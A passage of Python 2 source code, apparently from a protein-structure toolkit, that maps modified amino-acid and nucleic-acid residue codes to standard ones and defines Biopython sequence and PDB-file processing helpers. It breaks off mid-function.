'CXM' : 'MET' , # HETEROATOM THAT MAY BE TREATED AS MET
'FME' : 'MET' , # HETEROATOM THAT MAY BE TREATED AS MET
'MET' : 'MET' , # MET
'MSE' : 'MET' , # HETEROATOM THAT MAY BE TREATED AS MET
'OMT' : 'MET' , # HETEROATOM THAT MAY BE TREATED AS MET
'AME':'MET', ## AME MET ACETYLATED METHIONINE
'CXM':'MET', ## CXM MET N-CARBOXYMETHIONINE
'ESC':'MET', ## ESC MET 2-AMINO-4-ETHYL SULFANYL BUTYRIC ACID
'FME':'MET', ## FME MET FORMYL-METHIONINE
'FOR':'MET', ## FOR MET
'MET':'MET', ## MET MET
'MHO':'MET', ## MHO MET POST-TRANSLATIONAL MODIFICATION
'MME':'MET', ## MME MET N-METHYL METHIONINE
    'MSE':'MET', ## MSE MET SELENOMETHIONINE
'MSO':'MET', ## MSO MET METHIONINE SULFOXIDE
'OMT':'MET', ## OMT MET METHIONINE SULFONE
'SME':'MET', ## SME MET METHIONINE SULFOXIDE
'ASN' : 'ASN' , # ASN
'MEN' : 'ASN' , # HETEROATOM THAT MAY BE TREATED AS ASN
'AFA':'ASN', ## AFA ASN N-[7-METHYL-OCT-2,4-DIENOYL]ASPARAGINE
'AHB':'ASN', ## AHB ASN BETA-HYDROXYASPARAGINE
'ASN':'ASN', ## ASN ASN
'B3X':'ASN', ## B3X ASN (3S)-3,5-DIAMINO-5-OXOPENTANOIC ACID
'DMH':'ASN', ## DMH ASN N4,N4-DIMETHYL-ASPARAGINE
'DSG':'ASN', ## DSG ASN D-ASPARAGINE
'MEN':'ASN', ## MEN ASN GAMMA METHYL ASPARAGINE
'DPR' : 'PRO' , # HETEROATOM THAT MAY BE TREATED AS PRO
'PRO' : 'PRO' , # PRO
'1AB':'PRO', ## 1AB PRO 1,4-DIDEOXY-1,4-IMINO-D-ARABINITOL
'2MT':'PRO', ## 2MT PRO
'4FB':'PRO', ## 4FB PRO (4S)-4-FLUORO-L-PROLINE
'DPL':'PRO', ## DPL PRO 4-OXOPROLINE
'DPR':'PRO', ## DPR PRO D-PROLINE
'H5M':'PRO', ## H5M PRO TRANS-3-HYDROXY-5-METHYLPROLINE
'HY3':'PRO', ## HY3 PRO 3-HYDROXYPROLINE
'HYP':'PRO', ## HYP PRO 4-HYDROXYPROLINE
'LPD':'PRO', ## LPD PRO L-PROLINAMIDE
'P2Y':'PRO', ## P2Y PRO (2S)-PYRROLIDIN-2-YLMETHYLAMINE
'PCA':'PRO', ## PCA PRO 5-OXOPROLINE
'POM':'PRO', ## POM PRO CIS-5-METHYL-4-OXOPROLINE
'PRO':'PRO', ## PRO PRO
'PRS':'PRO', ## PRS PRO THIOPROLINE
'DGN' : 'GLN' , # HETEROATOM THAT MAY BE TREATED AS GLN
'GLN' : 'GLN' , # GLN
'DGN':'GLN', ## DGN GLN D-GLUTAMINE
'GHG':'GLN', ## GHG GLN GAMMA-HYDROXY-GLUTAMINE
'GLH':'GLN', ## GLH GLN
'GLN':'GLN', ## GLN GLN
'MGN':'GLN', ## MGN GLN 2-METHYL-GLUTAMINE
'ACL' : 'ARG' , # HETEROATOM THAT MAY BE TREATED AS ARG
'AGM' : 'ARG' , # HETEROATOM THAT MAY BE TREATED AS ARG
'ARG' : 'ARG' , # ARG
'ARM' : 'ARG' , # HETEROATOM THAT MAY BE TREATED AS ARG
'DAR' : 'ARG' , # HETEROATOM THAT MAY BE TREATED AS ARG
'HAR' : 'ARG' , # HETEROATOM THAT MAY BE TREATED AS ARG
'HMR' : 'ARG' , # HETEROATOM THAT MAY BE TREATED AS ARG
'2MR':'ARG', ## 2MR ARG N3, N4-DIMETHYLARGININE
'AAR':'ARG', ## AAR ARG ARGININEAMIDE
'ACL':'ARG', ## ACL ARG DEOXY-CHLOROMETHYL-ARGININE
'AGM':'ARG', ## AGM ARG 4-METHYL-ARGININE
'ALG':'ARG', ## ALG ARG GUANIDINOBUTYRYL GROUP
'AR2':'ARG', ## AR2 ARG ARGINYL-BENZOTHIAZOLE-6-CARBOXYLIC ACID
'ARG':'ARG', ## ARG ARG
'ARM':'ARG', ## ARM ARG DEOXY-METHYL-ARGININE
'ARO':'ARG', ## ARO ARG C-GAMMA-HYDROXY ARGININE
'BOR':'ARG', ## BOR ARG
'CIR':'ARG', ## CIR ARG CITRULLINE
'DA2':'ARG', ## DA2 ARG MODIFIED ARGININE
'DAR':'ARG', ## DAR ARG D-ARGININE
'HMR':'ARG', ## HMR ARG BETA-HOMOARGININE
'HRG':'ARG', ## HRG ARG L-HOMOARGININE
'MAI':'ARG', ## MAI ARG DEOXO-METHYLARGININE
'MGG':'ARG', ## MGG ARG MODIFIED D-ARGININE
'NMM':'ARG', ## NMM ARG MODIFIED ARGININE
'OPR':'ARG', ## OPR ARG C-(3-OXOPROPYL)ARGININE
'ORQ':'ARG', ## ORQ ARG N~5~-ACETYL-L-ORNITHINE
'TYZ':'ARG', ## TYZ ARG PARA ACETAMIDO BENZOIC ACID
'DSN' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'MIS' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'OAS' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'SAC' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'SEL' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'SEP' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'SER' : 'SER' , # SER
'SET' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'SVA' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'B3S':'SER', ## B3S SER (3R)-3-AMINO-4-HYDROXYBUTANOIC ACID
'BG1':'SER', ## BG1 SER
'DHL':'SER', ## DHL SER POST-TRANSLATIONAL MODIFICATION
'DSE':'SER', ## DSE SER D-SERINE N-METHYLATED
'DSN':'SER', ## DSN SER D-SERINE
'FGP':'SER', ## FGP SER
'GVL':'SER', ## GVL SER SERINE MODIFED WITH PHOSPHOPANTETHEINE
'HSE':'SER', ## HSE SER L-HOMOSERINE
'HSL':'SER', ## HSL SER HOMOSERINE LACTONE
'MC1':'SER', ## MC1 SER METHICILLIN ACYL-SERINE
'MIS':'SER', ## MIS SER MODIFIED SERINE
'N10':'SER', ## N10 SER O-[(HEXYLAMINO)CARBONYL]-L-SERINE
'NC1':'SER', ## NC1 SER NITROCEFIN ACYL-SERINE
'OAS':'SER', ## OAS SER O-ACETYLSERINE
'OSE':'SER', ## OSE SER O-SULFO-L-SERINE
'PG1':'SER', ## PG1 SER BENZYLPENICILLOYL-ACYLATED SERINE
'PYR':'SER', ## PYR SER CHEMICALLY MODIFIED
'S1H':'SER', ## S1H SER 1-HEXADECANOSULFONYL-O-L-SERINE
'SAC':'SER', ## SAC SER N-ACETYL-SERINE
'SBD':'SER', ## SBD SER
'SBG':'SER', ## SBG SER MODIFIED SERINE
'SBL':'SER', ## SBL SER
'SDP':'SER', ## SDP SER
'SEB':'SER', ## SEB SER O-BENZYLSULFONYL-SERINE
'SEL':'SER', ## SEL SER 2-AMINO-1,3-PROPANEDIOL
    'SEP':'SER', ## SEP SER PHOSPHOSERINE
'SER':'SER', ## SER SER
'SET':'SER', ## SET SER AMINOSERINE
'SGB':'SER', ## SGB SER MODIFIED SERINE
'SGR':'SER', ## SGR SER MODIFIED SERINE
'SOY':'SER', ## SOY SER OXACILLOYL-ACYLATED SERINE
'SUN':'SER', ## SUN SER TABUN CONJUGATED SERINE
'SVA':'SER', ## SVA SER SERINE VANADATE
'SVV':'SER', ## SVV SER MODIFIED SERINE
'SVX':'SER', ## SVX SER MODIFIED SERINE
'SVY':'SER', ## SVY SER MODIFIED SERINE
'SVZ':'SER', ## SVZ SER MODIFIED SERINE
'SXE':'SER', ## SXE SER MODIFIED SERINE
'ALO' : 'THR' , # HETEROATOM THAT MAY BE TREATED AS THR
'BMT' : 'THR' , # HETEROATOM THAT MAY BE TREATED AS THR
'DTH' : 'THR' , # HETEROATOM THAT MAY BE TREATED AS THR
'THR' : 'THR' , # THR
'TPO' : 'THR' , # HETEROATOM THAT MAY BE TREATED AS THR
'AEI':'THR', ## AEI THR ACYLATED THR
'ALO':'THR', ## ALO THR ALLO-THREONINE
'BMT':'THR', ## BMT THR
'CRO':'THR', ## CRO THR CYCLIZED
'CTH':'THR', ## CTH THR 4-CHLOROTHREONINE
'DTH':'THR', ## DTH THR D-THREONINE
'OLT':'THR', ## OLT THR O-METHYL-L-THREONINE
'TBM':'THR', ## TBM THR
'TH5':'THR', ## TH5 THR O-ACETYL-L-THREONINE
'THC':'THR', ## THC THR N-METHYLCARBONYLTHREONINE
'THR':'THR', ## THR THR
'TMD':'THR', ## TMD THR N-METHYLATED, EPSILON C ALKYLATED
    'TPO':'THR', ## TPO THR PHOSPHOTHREONINE
'DIV' : 'VAL' , # HETEROATOM THAT MAY BE TREATED AS VAL
'DVA' : 'VAL' , # HETEROATOM THAT MAY BE TREATED AS VAL
'MVA' : 'VAL' , # HETEROATOM THAT MAY BE TREATED AS VAL
'VAL' : 'VAL' , # VAL
'B2V':'VAL', ## B2V VAL VALINE BORONIC ACID
'DIV':'VAL', ## DIV VAL D-ISOVALINE
'DVA':'VAL', ## DVA VAL D-VALINE
'MNV':'VAL', ## MNV VAL N-METHYL-C-AMINO VALINE
'MVA':'VAL', ## MVA VAL N-METHYLATED
'NVA':'VAL', ## NVA VAL NORVALINE
'VAD':'VAL', ## VAD VAL DEAMINOHYDROXYVALINE
'VAF':'VAL', ## VAF VAL METHYLVALINE
'VAL':'VAL', ## VAL VAL
'VDL':'VAL', ## VDL VAL (2R,3R)-2,3-DIAMINOBUTANOIC ACID
'VLL':'VAL', ## VLL VAL (2S)-2,3-DIAMINOBUTANOIC ACID
'VME':'VAL', ## VME VAL O- METHYLVALINE
'DTR' : 'TRP' , # HETEROATOM THAT MAY BE TREATED AS TRP
'HTR' : 'TRP' , # HETEROATOM THAT MAY BE TREATED AS TRP
'LTR' : 'TRP' , # HETEROATOM THAT MAY BE TREATED AS TRP
'TPL' : 'TRP' , # HETEROATOM THAT MAY BE TREATED AS TRP
'TRO' : 'TRP' , # HETEROATOM THAT MAY BE TREATED AS TRP
'TRP' : 'TRP' , # TRP
'BTR':'TRP', ## BTR TRP 6-BROMO-TRYPTOPHAN
'1TQ':'TRP', ## 1TQ TRP 6-(FORMYLAMINO)-7-HYDROXY-L-TRYPTOPHAN
'23S':'TRP', ## 23S TRP MODIFIED TRYPTOPHAN
'32S':'TRP', ## 32S TRP MODIFIED TRYPTOPHAN
'32T':'TRP', ## 32T TRP MODIFIED TRYPTOPHAN
'4DP':'TRP', ## 4DP TRP
'4FW':'TRP', ## 4FW TRP 4-FLUOROTRYPTOPHANE
'4HT':'TRP', ## 4HT TRP 4-HYDROXYTRYPTOPHAN
'4IN':'TRP', ## 4IN TRP 4-AMINO-L-TRYPTOPHAN
'6CW':'TRP', ## 6CW TRP 6-CHLORO-L-TRYPTOPHAN
'DTR':'TRP', ## DTR TRP D-TRYPTOPHAN
'FTR':'TRP', ## FTR TRP FLUOROTRYPTOPHANE
'HTR':'TRP', ## HTR TRP BETA-HYDROXYTRYPTOPHANE
'PAT':'TRP', ## PAT TRP ALPHA-PHOSPHONO-TRYPTOPHAN
'TOX':'TRP', ## TOX TRP
'TPL':'TRP', ## TPL TRP TRYTOPHANOL
'TQQ':'TRP', ## TQQ TRP
'TRF':'TRP', ## TRF TRP N1-FORMYL-TRYPTOPHAN
'TRN':'TRP', ## TRN TRP AZA-TRYPTOPHAN
'TRO':'TRP', ## TRO TRP 2-HYDROXY-TRYPTOPHAN
'TRP':'TRP', ## TRP TRP
'TRQ':'TRP', ## TRQ TRP
'TRW':'TRP', ## TRW TRP
'TRX':'TRP', ## TRX TRP 6-HYDROXYTRYPTOPHAN
'TTQ':'TRP', ## TTQ TRP 6-AMINO-7-HYDROXY-L-TRYPTOPHAN
'DTY' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'IYR' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'PAQ' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'PTR' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'STY' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'TYB' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'TYQ' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
    'TYR' : 'TYR' , # TYR
    'TYS' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'TYY' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'1TY':'TYR', ## 1TY TYR
'2TY':'TYR', ## 2TY TYR
'3TY':'TYR', ## 3TY TYR MODIFIED TYROSINE
'B3Y':'TYR', ## B3Y TYR
'CRQ':'TYR', ## CRQ TYR
'DBY':'TYR', ## DBY TYR 3,5 DIBROMOTYROSINE
'DPQ':'TYR', ## DPQ TYR TYROSINE DERIVATIVE
'DTY':'TYR', ## DTY TYR D-TYROSINE
'ESB':'TYR', ## ESB TYR
'FLT':'TYR', ## FLT TYR FLUOROMALONYL TYROSINE
'FTY':'TYR', ## FTY TYR DEOXY-DIFLUOROMETHELENE-PHOSPHOTYROSINE
'IYR':'TYR', ## IYR TYR 3-IODO-TYROSINE
'MBQ':'TYR', ## MBQ TYR
'NIY':'TYR', ## NIY TYR META-NITRO-TYROSINE
'NBQ':'TYR', ## NBQ TYR
'OTY':'TYR', ## OTY TYR
'PAQ':'TYR', ## PAQ TYR SEE REMARK 999
'PTH':'TYR', ## PTH TYR METHYLENE-HYDROXY-PHOSPHOTYROSINE
'PTM':'TYR', ## PTM TYR ALPHA-METHYL-O-PHOSPHOTYROSINE
'PTR':'TYR', ## PTR TYR O-PHOSPHOTYROSINE
'TCQ':'TYR', ## TCQ TYR MODIFIED TYROSINE
'TTS':'TYR', ## TTS TYR
'TY2':'TYR', ## TY2 TYR 3-AMINO-L-TYROSINE
'TY3':'TYR', ## TY3 TYR 3-HYDROXY-L-TYROSINE
'TYB':'TYR', ## TYB TYR TYROSINAL
'TYC':'TYR', ## TYC TYR L-TYROSINAMIDE
'TYI':'TYR', ## TYI TYR 3,5-DIIODOTYROSINE
'TYN':'TYR', ## TYN TYR ADDUCT AT HYDROXY GROUP
'TYO':'TYR', ## TYO TYR
'TYQ':'TYR', ## TYQ TYR AMINOQUINOL FORM OF TOPA QUINONONE
'TYR':'TYR', ## TYR TYR
    'TYS':'TYR', ## TYS TYR SULPHONATED TYROSINE
'TYT':'TYR', ## TYT TYR
'TYY':'TYR', ## TYY TYR IMINOQUINONE FORM OF TOPA QUINONONE
'YOF':'TYR', ## YOF TYR 3-FLUOROTYROSINE
# 'GLX' : 'Z' # why is this here!?
}
####################
# NUCLEIC ACID STUFF
# for sequences...
NUCLEIC_SEQUENCE_LETTERS_MAP = {
'A' : 'A' ,
'G' : 'G' ,
'C' : 'C' ,
'T' : 'T' ,
'U' : 'U' ,
'a' : 'A' ,
'g' : 'G' ,
'c' : 'C' ,
't' : 'T' ,
'u' : 'U' ,
'DA' : 'A' ,
'DG' : 'G' ,
'DC' : 'C' ,
'DT' : 'T' ,
'dA' : 'A' ,
'dG' : 'G' ,
'dC' : 'C' ,
'dT' : 'T' ,
'ADE' : 'A' ,
'GUA' : 'G' ,
'CYT' : 'C' ,
'THY' : 'T' ,
'URA' : 'U' ,
'rA' : 'A' ,
    'rG' : 'G' ,
'rC' : 'C' ,
'rU' : 'U' ,
# HETATM lines
'1MA' : 'A' ,
'1MG' : 'G' ,
'2MG' : 'G' ,
'7MG' : 'G' ,
'OMG' : 'G' ,
'YG' : 'G' ,
'5MC' : 'C' ,
'CB2' : 'C' ,
'CBR' : 'C' ,
'DC' : 'C' ,
'OMC' : 'C' ,
'5BU' : 'U' ,
'5MU' : 'U' ,
'H2U' : 'U' ,
'PSU' : 'U' ,
'URI' : 'U'
}
# line_edit = line_edit.replace( 'HO2\'', '2HO*' )
# line_edit = line_edit.replace( 'HO5\'', '5HO*' )
# line_edit = line_edit.replace( 'H5\'\'', '2H5*' )
# line_edit = line_edit.replace('\'','*')
# line_edit = line_edit.replace('OP1','O1P')
# line_edit = line_edit.replace('OP2','O2P')
NA_CODES = {}
NA_CONVERSIONS_ROSETTA = {}
#####
# DNA
# codes whose presence indicates DNA definitively
NA_CODES['DNA'] = {
'T' : 'T' ,
't' : 'T' ,
'DA' : 'A' ,
'DG' : 'G' ,
'DC' : 'C' ,
'DT' : 'T' ,
'dA' : 'A' ,
'dG' : 'G' ,
'dC' : 'C' ,
'dT' : 'T' ,
'THY' : 'T'
}
# convert from sequence to the resName for PDB format
NA_CONVERSIONS_ROSETTA['DNA'] = {
'A' : 'A' ,
'G' : 'G' ,
'C' : 'C' ,
'T' : 'T' ,
'ADE' : 'A' ,
'GUA' : 'G' ,
'CYT' : 'C' ,
'THY' : 'T' ,
'1MA' : 'A' ,
'1MG' : 'G' ,
'2MG' : 'G' ,
'7MG' : 'G' ,
'OMG' : 'G' ,
'YG' : 'G' ,
'5MC' : 'C' ,
'CB2' : 'C' ,
'CBR' : 'C' ,
'DC' : 'C' ,
'OMC' : 'C' ,
}
# water! hooray!
WATER_CONVERSION = {
'W' : 'TP3' ,
'HOH' : 'TP3' ,
'H2O' : 'TP3' ,
'WAT' : 'TP3' ,
'TP3' : 'TP3' ,
'TP5' : 'TP3'
}
# fun with water
#WATER_CODE = 'TP3' # for possible use in PyRosetta
#WATER_CODES = ['W' , 'HOH' , 'H2O' , 'WAT' , 'TP3' , 'TP5'] # resNames
################################################################################
# METHODS
get_file_extension = lambda in_filename: in_filename.split( '.' )[-1]
get_file_extension.__doc__ = 'Returns the file extension of <in_filename>\n\nin_filename.split( \'.\' )[-1]'
# hacky version
get_root_filename = lambda in_filename: in_filename[:-len( get_file_extension( in_filename ) ) - 1]
get_root_filename.__doc__ = 'Returns the \"root filename\" of <in_filename> (pre file extension)\n\nin_filename[:-len( in_filename.split( \'.\' )[-1] ) - 1]\na little hacky...'
# better version
#get_root_filename = lambda in_filename: ''.join( [i for i in in_filename.split( '.' )[:-1]] )
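# example usage of the filename helpers (illustrative path):
#     get_file_extension( '/data/1YY9.pdb' )   # -> 'pdb'
#     get_root_filename( '/data/1YY9.pdb' )    # -> '/data/1YY9'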
# helper for creating a directory, checks for and deletes an existing directory of the same name
def create_directory( dir_name , tagline = ' to sort the data' ):
"""
Creates the directory <dir_name>
WARNING: this will delete the directory and its contents if it already
exists!
Optionally output something special in <tagline>
"""
# check if it exists
print 'Creating a new directory ' + os.path.relpath( dir_name ) + tagline
if os.path.isdir( dir_name ):
print 'a directory named ' + os.path.relpath( dir_name ) + ' already exists, deleting it now...'
shutil.rmtree( dir_name )
os.mkdir( dir_name )
# copy helper
def copy_file( filename , destination , display = False ):
"""
Copy <filename> to/into <destination>
just a cp wrapper...what?
"""
if display: # optional
if os.path.isdir( destination ):
print 'placing a copy of ' + os.path.relpath( filename ) + ' into the ' + os.path.relpath( destination ) + ' directory'
elif os.path.isfile( destination ):
print 'copying ' + os.path.relpath( filename ) + ' to ' + os.path.relpath( destination )
shutil.copy( filename , destination )
################################################################################
# SEQUENCE HANDLING HELPERS
# basic converters...its done a lot
# loading wrapper...basically cause "from Bio import SeqIO" is too long
def load_sequence( filename , ignore_empty = True , seqformat_map = SEQFORMAT_MAP ):
"""
Returns the list of sequences in <filename> as Biopython SeqRecord
objects
automatically handles different file format as specified by <seqformat_map>
Optionally <ignore_empty> sequences (SeqID in file but no sequence)
To get string, use get_sequence
"""
# determine the file format
seq_format = get_file_extension( filename )
# load ALL the sequences!
sequences = [i for i in SeqIO.parse( filename , seqformat_map[seq_format] )]
if ignore_empty:
sequences = [i for i in sequences if str( i.seq )]
# or just one...
if len( sequences ) == 1:
sequences = sequences[0]
return sequences
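# example usage (illustrative; "example.fa" is a hypothetical FASTA file):
#     record = load_sequence( 'example.fa' )
#     print record.id , str( record.seq )    # one sequence in the file -> a single SeqRecord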
# general converter!
def get_sequence( sequence , seq_format = SEQFORMAT , uppercase = True , ignore_empty = True , get_ids = False ):
"""
Returns a string or list of string depending on the input <sequence>
can accept:
a filename for a <seq_format> file
a Biopython Seq object
a Biopython SeqRecord object
a string
a list of any of the above (can be heterogenous)
Optionally change the sequence to <uppercase> (ambiguous positions are
sometimes lowercase)
Optionally <ignore_empty> sequences (SeqID in file but no sequence)
Optionally <get_ids> , returning a parallel list of SeqIDs and descriptions
"""
# sort the input data type
# for common Biopython objects
if type( sequence ) == Seq:
sequence = str( sequence )
elif type( sequence ) == SeqRecord:
seq_ids = str( sequence.id )
seq_des = str( sequence.description )
sequence = str( sequence.seq )
# input file
elif '.' in sequence: # should never occur!
# its a filename (?) so try to load it, it will error properly
sequence = load_sequence( sequence , ignore_empty )
        # sort by the number of sequences loaded
if type( sequence ) == list: # in accordance with the above
# optionally get the ids
if get_ids:
seq_ids = [str( i.id ) for i in sequence]
seq_des = [str( i.description )*( not i.description == i.id ) for i in sequence]
sequence = [str( i.seq ) for i in sequence]
else:
if get_ids:
seq_ids = str( sequence.id )
seq_des = str( sequence.description )*( not sequence.description == sequence.id )
sequence = str( sequence.seq )
# list of any of the above
elif type( sequence ) == list:
# then sort based on individual types...
sequence = [get_sequence( i , seq_format , uppercase , ignore_empty , get_ids ) for i in sequence]
if get_ids:
seq_ids = [i[1] for i in sequence]
seq_des = [i[2] for i in sequence]
sequence = [i[0] for i in sequence]
# should be an input single string
else:
seq_ids = ''
seq_des = ''
# optionally force UPPER case
if uppercase:
if type( sequence ) == str:
# single sequence
sequence = sequence.upper()
else:
# multiple
sequence = [i.upper() for i in sequence]
# optionally return the id and descriptions too
if get_ids:
return sequence , seq_ids , seq_des
return sequence
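# examples of the polymorphic input handling (all inputs hypothetical):
#     get_sequence( 'mktayiakqr' )                    # plain string -> 'MKTAYIAKQR'
#     get_sequence( SeqRecord( Seq( 'mkta' ) ) )      # SeqRecord -> 'MKTA'
#     get_sequence( 'example.fa' , get_ids = True )   # file -> (sequences , ids , descriptions)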
# general writer
# return the filename
def write_sequence( sequence , out_filename = '' , seq_format = SEQFORMAT , seqid = 'unknown' , description = '' , alphabet = DNAAlphabet , seq_format_map = SEQFORMAT_EXTENSION_MAP ):
"""
Write <sequence> to <out_filename> as <seq_format> using <alphabet>
Robust to sequence inputs that are:
str (filename or sequence)
Seq
SeqRecord
"""
# sort the input data type
unknown = 1
# for common Biopython objects
if isinstance( sequence , str ):
if '.' in sequence: # should never occur, okay, I made it occur
print 'it appears you input a path or filename...so its already a file!'
return sequence
sequence = SeqRecord( Seq( sequence , alphabet ) ) # already default ID of unknown
sequence.id = seqid
sequence.description = description
elif isinstance( sequence , unicode ): # hacky, unicode vs str
sequence = str( sequence )
if '.' in sequence: # should never occur
print 'it appears you input a path or filename...so its already a file!'
return sequence
sequence = SeqRecord( Seq( sequence , alphabet ) ) # already default ID of unknown
sequence.id = seqid
sequence.description = description
elif isinstance( sequence , Seq ):
sequence = SeqRecord( sequence )
sequence.id = seqid
sequence.description = description
elif isinstance( sequence , list ):
# yay, do it all over again :(
# make recursive
# assume all members are the same type...else its an error anyway
if isinstance( sequence[0] , str ):
for i in xrange( len( sequence ) ):
sequence[i] = SeqRecord( Seq( sequence[i] , alphabet ) )
sequence[i].id = seqid + '_' + str( unknown )
sequence[i].description = description
unknown += 1
elif isinstance( sequence[0] , Seq ):
for i in xrange( len( sequence ) ):
            sequence[i] = SeqRecord( sequence[i] )
sequence[i].id = seqid + '_' + str( unknown )
sequence[i].description = description
unknown += 1
# now that all are Biopython SeqRecords, write to file!
if not out_filename:
if type( sequence ) == list:
out_filename = sequence[0].id + '.' + seq_format_map[seq_format]
else:
out_filename = sequence.id + '.' + seq_format_map[seq_format]
SeqIO.write( sequence , out_filename , seq_format )
print 'Successfully wrote the sequence(s) to ' + os.path.relpath( out_filename )
return out_filename
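# example usage (illustrative; writes "my_seq.fa" to the working directory):
#     write_sequence( 'MKTAYIAKQR' , 'my_seq.fa' , seqid = 'my_seq' ,
#                     description = 'toy example' , alphabet = ProteinAlphabet )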
################################################################################
# FULL RAW PROCESSING
# 1R69 - single model, single chain
# 1A17 - another random choice for testing
# 1BUW
# 1C17
# 1JYX
# 1M2V
# 1TF6
# 2C35
# 3G3O
# 1YY8 - AB and CD, single model
# 1NMR - multiple models
# 1LR1 - multiple models AND chains
# 1VTL - protein and DNA, single model
# 1UN6 - protein and RNA, single model
# the big boy...
def process_pdb( pdb_filename , seqformat = SEQFORMAT , seqformat_extension_map = SEQFORMAT_EXTENSION_MAP , conversion = three2three , na_conversion = NA_CONVERSIONS_ROSETTA , na_alphabet = DNAAlphabet , protein_alphabet = ProteinAlphabet ):
"""
Create a directory from <pdb_filename> containing relevant information
stored in the PDB file
This method behaves slightly differently for PDB files with multiple models,
nucleic acids, duplicate complexes, etc.
so if you are interested in the specifics, please read the source code
In short, it tries to write:
header.txt a text file of the header lines
numbering_map.txt a text file showing 1-indexed PDB numbering
clean.pdb only ATOM lines
hetatm.pdb only HETATM lines, may be split by resName
.fa sequences of all peptides and nucleic acids
subdirectories for each protein model/subunit (similar info)
does not write a text file for the "trailer" (lines after the coordinates)
converts lines (ATOM or HETATM) that can be converted based on <conversion>
(generally) and <na_conversion> (specific for nucleic acids, relevant
because RNA and DNA may require different treatment...)
!!!WARNING!!! defaults:
CSE CYS converts SelenoCysteinE to Cysteine
HYP PRO converts HYdroxylProline to Proline
CYD CYS does NOT convert "CYsteine Disulfides to Cysteine"
HIP HIS converts "HIP" to Histidine (~double protonation)
HID HIS converts "HID" to Histidine (~single delta N proton)
HIE HIS converts "HIE" to Histidine (~single epsilon N proton)
todo:
        ensure hetatm conversions skip illegal atoms!!!!
alternate conformations
convert DNA to Rosetta DNA
convert ligands to params
convert water to TP3 (or TP5)
"""
# process input, optionally a list
if isinstance( pdb_filename , list ):
print 'Multiple PDB codes detected, processing them individually...'
# use this list comprehension, get them all!
filenames = [process_pdb( i , seqformat , seqformat_extension_map , conversion , na_conversion , na_alphabet , protein_alphabet ) for i in pdb_filename]
print 'Finished the whole list, enjoy!'
return filenames
####################
# NEW DIRECTORY ETC.
# get root name
pdb_filename = os.path.abspath( pdb_filename )
root_name = get_root_filename( pdb_filename )
best_guess = pdb_filename
# make a new directory, a whole lot is gonna go here...
create_directory( root_name , ' to sort the data' )
# move the pdb here
copy_file( pdb_filename , root_name )
# oh, and go there too
original_dir = os.getcwd()
os.chdir( root_name )
# "update" the target
pdb_filename = root_name + '/' + os.path.split( pdb_filename )[-1]
root_name = get_root_filename( pdb_filename )
##############
# PRE CLEANING
# does not need to know if nucleics or not
# convertions!
# ...bad...overwrite the file!...but no filename management
convert_pdb_resnames_to_ATOM_lines( pdb_filename , pdb_filename , root_name +'_conversion_report.txt' , conversion )
# produce a PDB with just the protein lines
best_guess = clean_ATOM_lines_from_pdb( pdb_filename )
# extract numbering
# don't bother storing the map
extract_numbering_map_from_pdb( pdb_filename , 'numbering_map.txt' )
# extract HETATM lines
clean_HETATM_lines_from_pdb( pdb_filename )
# write out alternate conformations for the cleaned file
alternate_conformations = clean_alternate_conformations_from_pdb( best_guess )
##########################
# HEADER PARSING
# extract info from header
# this information is accessible from the PDBParser header...sorta...
# get the number of models
models = extract_number_of_models_from_pdb_header( pdb_filename )
# get the subunit complexes
complexes = extract_duplicate_chains_from_pdb_header( pdb_filename )
# write the header (?)
# get the header
header = extract_header_from_pdb( pdb_filename )
###################
# HUNT DOWN HETATMS
# use the map in the header and extracted chemical formulas to search pubchem
# get map
# per hetatm type
# get formula
# get number of residues -> needed to interpret formula...
# search pubchem, download best sdf if exact match and at least < atoms
# create directory for these params etc.
##########################
# ASSESS NUCLEIC SITUATION
# HERE!
# choose your fate!, removes nucleic lines
has_nucleic = clean_nucleic_acid_lines_from_pdb( pdb_filename )
# get proteins if nucleics
if has_nucleic:
# get a PDB of protein only, use this from now on
print 'Scanners indicate there are nucleic acid lines in ' + os.path.relpath( pdb_filename ) + '\nSadly, a lot of toys do not play well with these so a few extra steps are required...'
# write nucleic sequences
temp , nucleic_types = extract_nucleic_acid_sequences_from_pdb( root_name + '.nucleic.pdb' , seqformat = seqformat , alphabet = na_alphabet , seqformat_extension_map = seqformat_extension_map )
# care not for the sequences
# make a Rosetta ready nucleic PDB!!!
# SO BAD! overwrite!
# BAH!!!
na_chains = split_pdb_into_chains( root_name + '.nucleic.pdb' , 0 , True ) # just 0 model...
for i in na_chains.keys():
# BETTER BE IN BOTH!!!
convert_pdb_resnames_to_ATOM_lines( na_chains[i] , na_chains[i] , 'nucleic_chain_'+ i +'_conversion_report.txt' , na_conversion[nucleic_types[i]] )
# check for protein :)
has_protein = clean_protein_lines_from_pdb( pdb_filename )
if not has_protein:
            print 'The additional features are only available for proteins\nScanners indicate that this PDB has ONLY nucleic acids (no proteins) :(\nthe remaining methods rely on the Biopython PDBParser...and things get messy with nucleic acids\nEven so, the only feature you\'re missing out on is splitting into subdirectories for each chain, and since the PDB is just nucleic acid, that isn\'t as helpful'
# premature exit
os.chdir( original_dir )
return best_guess
# change the name of the best guess to .protein.pdb
best_guess = root_name + '.protein.pdb'
pdb_filename = root_name + '.protein.pdb'
# get the nucleic chains
nucleic_chains = extract_chains_from_pdb( root_name + '.nucleic.pdb' )
############
# PDB PARSER
# does NOT loop over ANY nucleic acid chains!
# prepare to load...
parser = PDBParser( PERMISSIVE = 1 )
writer = PDBIO()
struct = parser.get_structure( root_name , pdb_filename )
# verify models and chains
temp = len( struct.child_list ) # number of models
if not temp == models:
